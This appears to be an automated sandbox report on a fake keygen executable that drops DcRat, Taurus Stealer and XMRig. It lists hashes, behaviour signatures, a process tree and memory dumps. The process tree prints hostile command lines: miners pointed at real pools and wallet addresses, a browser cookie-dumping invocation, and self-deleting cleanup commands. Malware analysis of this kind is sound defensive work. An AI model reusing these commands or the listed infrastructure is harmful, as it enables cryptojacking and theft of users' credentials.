Analysis

  • max time kernel
    149s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    04-04-2021 11:52

General

  • Target

    keygen-step-4.exe

  • Size

    3.0MB

  • MD5

    3ac32a87de172d89addb21d6b309b7d3

  • SHA1

    947df0b364b7773397620d396d9278d9dba48ac2

  • SHA256

    3f78af0e31a617f10ece7cffca4b530ac38b5c2079e004a690b4181e98b7288c

  • SHA512

    50aaccee48be92fa7f59a87da150c4f611f0173e595f252f068b67a9794626d58a904799054ca10c5d7bb22f14045c4aacf93c3424449e5df677a800a91cb626

Malware Config

Signatures

  • DcRat

    DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner Payload 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 15 IoCs
  • Loads dropped DLL 43 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 42 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
    PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:840
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2444
  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
    1⤵
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of WriteProcessMemory
    PID:1896
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
        2⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1776
          • C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe
            "C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious use of WriteProcessMemory
            PID:1820
              • C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe
                "C:\Users\Admin\AppData\Local\Temp\PQM1ALU0SI\multitimer.exe" 1 101
                4⤵
                • Executes dropped EXE
                PID:804
          • C:\Users\Admin\AppData\Local\Temp\HNWYSQO8JM\setups.exe
            "C:\Users\Admin\AppData\Local\Temp\HNWYSQO8JM\setups.exe" ll
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:428
              • C:\Users\Admin\AppData\Local\Temp\is-588CU.tmp\setups.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-588CU.tmp\setups.tmp" /SL5="$2017C,454998,229376,C:\Users\Admin\AppData\Local\Temp\HNWYSQO8JM\setups.exe" ll
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1148
                  • C:\Program Files\Internet Explorer\iexplore.exe
                    "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                    5⤵
                    • Modifies Internet Explorer settings
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SetWindowsHookEx
                    • Suspicious use of WriteProcessMemory
                    PID:460
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460 CREDAT:275457 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1656
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:460 CREDAT:472074 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • NTFS ADS
                        • Suspicious use of SetWindowsHookEx
                        PID:2160
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
        2⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:740
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c taskkill /f /im chrome.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1652
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im chrome.exe
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1100
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full_Version.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Full_Version.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2116
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2184
              • C:\Windows\SysWOW64\rundll32.exe
                "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                4⤵
                • Loads dropped DLL
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2296
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2204
          • C:\Users\Admin\AppData\Roaming\6164.tmp.exe
            "C:\Users\Admin\AppData\Roaming\6164.tmp.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of SetThreadContext
            • Modifies system certificate store
            PID:2572
              • C:\Windows\system32\msiexec.exe
                -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                4⤵
                PID:3032
              • C:\Windows\system32\msiexec.exe
                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
                4⤵
                • Blocklisted process makes network request
                • Suspicious use of AdjustPrivilegeToken
                PID:1828
          • C:\Users\Admin\AppData\Roaming\623F.tmp.exe
            "C:\Users\Admin\AppData\Roaming\623F.tmp.exe"
            3⤵
            • Executes dropped EXE
            PID:2624
              • C:\Windows\SysWOW64\cmd.exe
                /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\623F.tmp.exe
                4⤵
                PID:1920
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 3
                    5⤵
                    • Delays execution with timeout.exe
                    PID:432
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
            3⤵
            PID:2228
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1
                4⤵
                • Runs ping.exe
                PID:2332
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
        2⤵
        • Executes dropped EXE
        PID:2212
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2080
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        PID:2404
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            PID:2832
          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
            3⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:1556

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/428-39-0x0000000000401000-0x000000000040C000-memory.dmp

    Filesize

    44KB

  • memory/804-55-0x0000000001E50000-0x0000000001E52000-memory.dmp

    Filesize

    8KB

  • memory/804-52-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

    Filesize

    9.6MB

  • memory/804-53-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

    Filesize

    9.6MB

  • memory/840-96-0x00000000016E0000-0x0000000001747000-memory.dmp

    Filesize

    412KB

  • memory/840-83-0x0000000000810000-0x0000000000854000-memory.dmp

    Filesize

    272KB

  • memory/1148-40-0x00000000002C0000-0x00000000002C1000-memory.dmp

    Filesize

    4KB

  • memory/1776-13-0x0000000000580000-0x0000000000582000-memory.dmp

    Filesize

    8KB

  • memory/1776-10-0x000007FEF5430000-0x000007FEF5E1C000-memory.dmp

    Filesize

    9.9MB

  • memory/1776-11-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

    Filesize

    4KB

  • memory/1820-42-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

    Filesize

    9.6MB

  • memory/1820-17-0x000007FEEDFE0000-0x000007FEEE97D000-memory.dmp

    Filesize

    9.6MB

  • memory/1820-19-0x00000000020F0000-0x00000000020F2000-memory.dmp

    Filesize

    8KB

  • memory/1828-125-0x0000000140000000-0x000000014070A000-memory.dmp

    Filesize

    7.0MB

  • memory/1828-124-0x0000000000100000-0x0000000000114000-memory.dmp

    Filesize

    80KB

  • memory/1828-121-0x0000000140000000-0x000000014070A000-memory.dmp

    Filesize

    7.0MB

  • memory/1828-128-0x0000000140000000-0x000000014070A000-memory.dmp

    Filesize

    7.0MB

  • memory/1828-134-0x0000000000170000-0x0000000000190000-memory.dmp

    Filesize

    128KB

  • memory/1896-2-0x0000000075781000-0x0000000075783000-memory.dmp

    Filesize

    8KB

  • memory/1900-41-0x000007FEF6080000-0x000007FEF62FA000-memory.dmp

    Filesize

    2.5MB

  • memory/2080-142-0x0000000000990000-0x0000000000991000-memory.dmp

    Filesize

    4KB

  • memory/2080-136-0x000007FEF5220000-0x000007FEF5C0C000-memory.dmp

    Filesize

    9.9MB

  • memory/2080-137-0x0000000000C80000-0x0000000000C81000-memory.dmp

    Filesize

    4KB

  • memory/2080-139-0x00000000003D0000-0x00000000003D1000-memory.dmp

    Filesize

    4KB

  • memory/2080-140-0x000000001B0A0000-0x000000001B0A2000-memory.dmp

    Filesize

    8KB

  • memory/2080-141-0x00000000003E0000-0x0000000000401000-memory.dmp

    Filesize

    132KB

  • memory/2184-76-0x00000000025F0000-0x00000000025F4000-memory.dmp

    Filesize

    16KB

  • memory/2204-110-0x0000000002550000-0x0000000002598000-memory.dmp

    Filesize

    288KB

  • memory/2204-70-0x0000000000020000-0x000000000002D000-memory.dmp

    Filesize

    52KB

  • memory/2212-133-0x0000000070E60000-0x0000000071003000-memory.dmp

    Filesize

    1.6MB

  • memory/2296-94-0x0000000000510000-0x0000000000566000-memory.dmp

    Filesize

    344KB

  • memory/2296-93-0x00000000001C0000-0x00000000001FA000-memory.dmp

    Filesize

    232KB

  • memory/2444-98-0x0000000000500000-0x0000000000567000-memory.dmp

    Filesize

    412KB

  • memory/2444-148-0x00000000029A0000-0x0000000002AA6000-memory.dmp

    Filesize

    1.0MB

  • memory/2572-109-0x000007FEFBA71000-0x000007FEFBA73000-memory.dmp

    Filesize

    8KB

  • memory/2624-113-0x0000000007180000-0x000000000C5FC000-memory.dmp

    Filesize

    84.5MB

  • memory/2624-120-0x0000000000400000-0x000000000587C000-memory.dmp

    Filesize

    84.5MB

  • memory/3032-123-0x0000000140000000-0x0000000140383000-memory.dmp

    Filesize

    3.5MB

  • memory/3032-118-0x0000000140000000-0x0000000140383000-memory.dmp

    Filesize

    3.5MB